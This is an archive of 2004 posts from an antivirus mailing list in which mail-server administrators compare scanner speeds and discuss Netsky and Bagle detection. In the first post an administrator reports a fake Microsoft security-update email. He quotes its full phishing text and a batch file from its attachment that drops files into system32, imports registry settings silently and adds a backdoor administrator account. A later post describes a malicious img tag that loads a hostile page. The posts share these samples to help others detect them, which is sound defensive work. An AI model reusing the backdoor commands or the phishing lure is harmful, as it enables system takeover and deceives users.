[Declude.Virus] New virus?
I've just received a fake microsoft email with a 744kb patch attached.
It was not detected by my Norton, not by F-Prot, nor AVG or McAffee.
In this patch it has a start batch file which does this:
@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER
/TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
cls
UPDATE.EXE
cls
exit
I've attached the email without the virus so you can have a look at it.
Adrian
--- Begin Message ---
Critical
announcements
An important security announcement to all Microsoft
Windows users!
Critical Security
Update for Microsoft Windows (KB2856093)
A critical security
issue has been identified that could allow an attacker to compromise
a computer running Windows and gain control over your system and files.
This issue has been discussed in KB2856093 Microsoft Knowledge Base.
Microsoft Security Response Team recommends to protect your computer
by installing this update from Microsoft.
Patch Information:
Type:
Critical
Security Update
Vulnerability:
High
Vendor notified:
April
29, 2004
Update Release Date:
May 02, 2004
Download Size:
744
KB, < 2 minutes @ 28.8 modem
File Name:
WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions:
Microsoft
Windows 95/98/ME/NT/2000/XP/2003
To install this update, follow these
instructions:
1
Download
WINDOWS-KB2856093-X86-ENU.EXE file from Windows
Update site or open an attached file.
2
Launch
WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen
instructions.
3
After you install this item, you may
have to restart your computer, to ensure a full protection.
©2004 Microsoft Corporation. All
rights reserved.
Terms of Use
|
Privacy Statement
--- End Message ---
[Declude.Virus] Dangerous img dynsrc tag in body
Just for your information: We received a couple of Spam emails (fake ebay notifications) with the following dangerous tag in the body: http://68.192.132.122_:8067/')> (I added the _ at the end so it doesn't harm anyone) As soon as you open the email, the window will open the url. The website hosts a dangerous ActiveX script that gets executed as soon as you open the website. The Antivirus(F-prot, AVG, McAfee) did not find a virus in the email and let it through because it's just a html tag. I added a body filter that searches for "http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] Faster second scanner needed
My AV scanners are running a bit slower than yours because the server is not very new and fancy and we do not have that much traffic: PIII 666 256MB Ram IDE Raid1 with old 2x30GB HD (2-3years old) I guess with Raid10, new HD, dual P4 and more ram this would speed it up 10x. Anyway, the proportions in the time consumption should be similar. Adrian - - Original Message - From: Matt To: [EMAIL PROTECTED] Sent: Wednesday, March 31, 2004 3:04 PM Subject: Re: [Declude.Virus] Faster second scanner needed Adrian,This is helpful, however the control is different as mine was based on the 32 bit version of F-Prot (fpcmd.exe).It appears from your logs that 16 bit F-Prot beat out 32-bit McAfee by 50% or more. I'm not sure if the F-Prot being 16 bit had all that much effect, but one would expect for it to be slower than the 32 bit version. On my system, F-Prot can detect a virus in about 0.1 seconds, and the 32-bit version of AVG takes about 0.4 seconds (standard 30 KB Netsky/Bagle variants during low load).Note that most of the delay with AVG in 16-bit mode is that it runs within NTVDM. This goes away when you switch to the 32-bit version 7 which now supports the error codes that Declude uses. The switch though didn't seem to do much to the processor utilization, however the wider window does keep more concurrent processes open at the same time and that isn't optimal.Thanks,MattAdrian Hauri wrote: AVG takes about 4 seconds to fire up the AV Engine and scan. I'm running the 16bit version 6 of AVG. I would recommend you to use McAfee. I use version 4.32 for more than a year now and it is as fast as F-Prot. Also it was the first and only AV scanner for several days who was able to detect viruses in pwd protected zip files like bagle. Here is part of my logfile from another server running my own script with stalker communigate pro: 01:07:33.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1760059.msg 01:07:34.67 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1760059.msg MCAFEE. 01:07:35.28 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1760059.msg seems to be clean (F-Prot) 01:07:39.28 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1760059.msg With AVG 13:13:21.11 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1750545.msg 13:13:22.72 4 EXTFILTER(ANTIVIRUS) inp(93): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1750545.msg MCAFEE. 13:13:23.61 4 EXTFILTER(ANTIVIRUS) inp(87): * Infection: W32/[EMAIL PROTECTED] in Queue\1750545.msg FPROT. 13:13:27.96 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.C in Queue\1750545.msg AVG. I hope this helps to compare the speed. F-Prot is the 16bit Fprot for dos version. Adrian - - Original Message - From: "Matt" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, March 31, 2004 10:38 AM Subject: [Declude.Virus] Faster second scanner needed As I continue to research opportunities for increasing efficiency in order to extend the life of my current environment, I have identified AVG Anti-Virus as one of the biggest processor hogs, and holder of the most opportunity. F-Prot is 4 times faster, and maybe more efficient than that when it comes to processor utilization. Outside of efficiency, AVG has proven to be a good second scanner, and this should only be an issue if you are approaching the capacity of your environment. With AVG commented out and only F-Prot running, the peaks are much shorter and much lower, but I can ride 100% for over 5 seconds several times a minute during rush hours with both scanners enabled. Everything that I've read about Kaspersky seems to indicate that they are the fastest at detecting new viruses, but their "File Server" edition costs $370 retail, and 70% of that yearly. I suppose that I might be able to find this much cheaper through a wholesaleing source. My main concern though is efficiency, and I would take an average scanner if it was the most efficient over the best scanner if it was average in terms of efficiency. If anyone has some first hand knowledge concerning efficiency of any of the scanners, please let me know. I believe this can be tracked by doing the following if you use F-Prot as one of two or more scanners: 1) Change to LOGLEVEL DEBUG in your Virus.config 2) Wait for three viruses to be blocked (not 1K ECAIR tests, the real deal). 3) Change your LOGLEVEL back to it's normal setting. 4) Compare the times logged for each scanner (you can post them here or E-mail them to me and I would be happy to decipher) I would imagine that with most 32 bit scanners, the difference in time will be directly related to the processing power required to run the scanner, or at least that holds true for the comp
Re: [Declude.Virus] Netsky.P Occasionally Slips through?
the same happens here with f-prot for dos: 14:57:39.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1730292.msg 14:57:40.64 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1730292.msg MCAFEE. 14:57:41.36 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1730292.msg seems to be clean (F-Prot) 14:57:45.31 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1730292.msg AVG. Adrian - - Original Message - From: "Jonathan" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, March 30, 2004 12:43 PM Subject: Re: [Declude.Virus] Netsky.P Occasionally Slips through? > I sent one. There have been several, not sure if the one I sent is > indicative of all of them, but it's the only one I could easily get out of > a local quarantine. > > Jonathan > > At 07:51 PM 3/29/2004, you wrote: > > > >>F-Prot's manual scan results: > >>C:\eudora\ATTACH\document_all02c.zip->document.txt > >> a security risk or a "backdoor" program > > > >That sounds like an exit code of 8, meaning that F-Prot detected a > >suspicious file, but not a virus. > > > >Would it be possible to E-mail the .ZIP file to the declude.com virustrap@ > >address, so we can analyze it? > > > >-Scott > >--- > >Declude JunkMail: The advanced anti-spam solution for IMail mailservers > >since 2000. > >Declude Virus: Ultra reliable virus detection and the leader in mailserver > >vulnerability detection. > >Find out what you've been missing: Ask for a free 30-day evaluation. > > > >--- > >[This E-mail was scanned for viruses by Declude Virus > >(http://www.declude.com)] > > > >--- > >This E-mail came from the Declude.Virus mailing list. To > >unsubscribe, just send an E-mail to [EMAIL PROTECTED], and > >type "unsubscribe Declude.Virus".The archives can be found > >at http://www.mail-archive.com. > > > > --- > [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] > > --- > This E-mail came from the Declude.Virus mailing list. To > unsubscribe, just send an E-mail to [EMAIL PROTECTED], and > type "unsubscribe Declude.Virus".The archives can be found > at http://www.mail-archive.com. > > --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] Faster second scanner needed
AVG takes about 4 seconds to fire up the AV Engine and scan. I'm running the 16bit version 6 of AVG. I would recommend you to use McAfee. I use version 4.32 for more than a year now and it is as fast as F-Prot. Also it was the first and only AV scanner for several days who was able to detect viruses in pwd protected zip files like bagle. Here is part of my logfile from another server running my own script with stalker communigate pro: 01:07:33.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1760059.msg 01:07:34.67 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1760059.msg MCAFEE. 01:07:35.28 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1760059.msg seems to be clean (F-Prot) 01:07:39.28 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1760059.msg With AVG 13:13:21.11 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1750545.msg 13:13:22.72 4 EXTFILTER(ANTIVIRUS) inp(93): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1750545.msg MCAFEE. 13:13:23.61 4 EXTFILTER(ANTIVIRUS) inp(87): * Infection: W32/[EMAIL PROTECTED] in Queue\1750545.msg FPROT. 13:13:27.96 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.C in Queue\1750545.msg AVG. I hope this helps to compare the speed. F-Prot is the 16bit Fprot for dos version. Adrian - - Original Message - From: "Matt" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, March 31, 2004 10:38 AM Subject: [Declude.Virus] Faster second scanner needed > As I continue to research opportunities for increasing efficiency in > order to extend the life of my current environment, I have identified > AVG Anti-Virus as one of the biggest processor hogs, and holder of the > most opportunity. F-Prot is 4 times faster, and maybe more efficient > than that when it comes to processor utilization. Outside of > efficiency, AVG has proven to be a good second scanner, and this should > only be an issue if you are approaching the capacity of your > environment. With AVG commented out and only F-Prot running, the peaks > are much shorter and much lower, but I can ride 100% for over 5 seconds > several times a minute during rush hours with both scanners enabled. > > Everything that I've read about Kaspersky seems to indicate that they > are the fastest at detecting new viruses, but their "File Server" > edition costs $370 retail, and 70% of that yearly. I suppose that I > might be able to find this much cheaper through a wholesaleing source. > > My main concern though is efficiency, and I would take an average > scanner if it was the most efficient over the best scanner if it was > average in terms of efficiency. If anyone has some first hand knowledge > concerning efficiency of any of the scanners, please let me know. I > believe this can be tracked by doing the following if you use F-Prot as > one of two or more scanners: > > 1) Change to LOGLEVEL DEBUG in your Virus.config > 2) Wait for three viruses to be blocked (not 1K ECAIR tests, the > real deal). > 3) Change your LOGLEVEL back to it's normal setting. > 4) Compare the times logged for each scanner (you can post them here > or E-mail them to me and I would be happy to decipher) > > I would imagine that with most 32 bit scanners, the difference in time > will be directly related to the processing power required to run the > scanner, or at least that holds true for the comparison between F-Prot > and AVG on my system. Note that the times between systems shouldn't be > compared, only the relative multiple of the second scanner to F-Prot > should be compared, that way you establish F-Prot's time as being the > control. > > I'm primarily interested in Kaspersky, ClamAV and McAfee, in that order, > though I'm welcome to suggestions for other products that don't prohibit > command line scanning of E-mail in their licenses. > > Anecodotal evidence is also appreciated :) > > Thanks, > > Matt > > -- > = > MailPure custom filters for Declude JunkMail Pro. > http://www.mailpure.com/software/ > = > > > --- > [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] > > --- > This E-mail came from the Declude.Virus mailing list. To > unsubscribe, just send an E-mail to [EMAIL PROTECTED], and > type "unsubscribe Declude.Virus".The archives can be found > at http://www.mail-archive.com. > > --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] W32.Beagle.J@mm cannot be caught
Please read the old posts about this problem. Short Summary: Antivirus programs and declude can't open password protected zip files (F-Prot, McAfee, AVG) unless they try to find a password within the email and use this to unlock the zip file (Kapersky). Some Virus scanners block password protected zip files in general and declare them as a Virus (Symantec/Norton AV) even they couldn't scan within the zip file. Scott added the feature BANEXT EZIP in the interim release >= i8 to block all password protected zip files on the server with declude. Interim release http://www.declude.com/interim . (I would recommend you to install a second AV because it took F-Prot too long to update their definitions the last few month) Adrian - - Original Message - From: "terry ip" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, March 10, 2004 12:43 PM Subject: [Declude.Virus] [EMAIL PROTECTED] cannot be caught > Hi All, > > Desktop Norton caught but declude didn't. I'm using Declude 1.75 + F-prot > 3.14a with the latest virus pattern. Anyone have the same problem as I'm? or > any cure on this? Thanks. > > Terry > > _ > Linguaphone : Learning English? Get Japanese lessons for FREE > http://go.msnserver.com/HK/30476.asp > > --- > [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] > > --- > This E-mail came from the Declude.Virus mailing list. To > unsubscribe, just send an E-mail to [EMAIL PROTECTED], and > type "unsubscribe Declude.Virus".The archives can be found > at http://www.mail-archive.com. > > --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
[Declude.Virus] Does anyone have a AVG V6.0 Update script?
Has anyone an AVG V6.0 update script that can be run as a batch file? There is a V7.0 batch file available which doesn't work for version 6.0 . I would like to update AVG V6.0 several times a day. The built-in updater and scheduler is crap and doesn't work when you are not logged in. Also it can run just once within 24h. Thanks for your help. Adrian
Re: [Declude.Virus] AVG V6 much slower than FProt and McAfee
>Currently only the 16-bit version works with Declude, the 32-bit version will soon. >16-bit apps have a big performance hit because they run under NTVDM. I think it's not a 16Bit/32Bit issue. My F-Prot runs also in the 16bit Dos Version and is much faster than AVG. (I tested it Communigate Pro and not with Imail/Declude) Try to run AVG from the command line and then you know what I mean. Type this at the command promt: C:\Progra~1\Grisoft\AVG6\avg.exe /NOMEM /NOSELF /ARC /REPORT=report.txt *.123 The scanning itself takes less than 1sec, but the startup takes 2seconds. When AVG starts up, it also shows the following: AVG_6_0_Dos32_Init (c) GRISOFT, s.r.o,1999-2003 Does it mean that it runs in 32bit mode or does it just detect a 32bit dos environment? Adrian - Original Message - From: Matt To: [EMAIL PROTECTED] Sent: Thursday, February 26, 2004 2:44 PM Subject: Re: [Declude.Virus] AVG V6 much slower than FProt and McAfee Currently only the 16-bit version works with Declude, the 32-bit version will soon. 16-bit apps have a big performance hit because they run under NTVDM. Matt Adrian Hauri wrote: I just installed AVG 6.0 free edition and it seems that it takes a long time to fire it up: 14:24:10.40 * start virus scan 14:24:11.35 * Found: EICAR test file NOT a virus. (MCAFEE 4.5) 14:24:11.95 * Infection: EICAR_Test_File (FPROT 3.5) 14:24:15.78 * identified EICAR_Test (AVG 6.0) I used for all virus scanners the string from the declude virus manual site. It takes AVG approx. 3 seconds to start up before scanning compared to 1 second for the other scanners. The scanning itself seems to be fast, it's just the start-up. Is this normal? Has anyone else the same performance problem? Thanks for your help. Adrian http://www.mailpure.com/software/ = --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
Re: [Declude.Virus] BANnotify.eml
go to http://www.declude.com/virus/manual.htm to get the latest update. Cheers Adrian - ToadShow Pty Ltd phone: 07 3004 7900 fax: 07 3846 1220 email: [EMAIL PROTECTED] http://www.toadshow.com.au - - Original Message - From: "David Dodell" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Thursday, February 26, 2004 3:06 PM Subject: [Declude.Virus] BANnotify.eml > Can someone send me a copy of their Bannotify.eml ... > > David > > --- > [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] > > --- > This E-mail came from the Declude.Virus mailing list. To > unsubscribe, just send an E-mail to [EMAIL PROTECTED], and > type "unsubscribe Declude.Virus".The archives can be found > at http://www.mail-archive.com. > > --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
[Declude.Virus] TCP WAIT TIME
Has anyone of you guys ever had this problem? It could be helpful during the high traffic time that the Sobig Virus causes: http://www.stalker.com/CommuniGatePro/Scalability.html#TimeWait Adrian --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.Virus mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.Virus".The archives can be found at http://www.mail-archive.com.
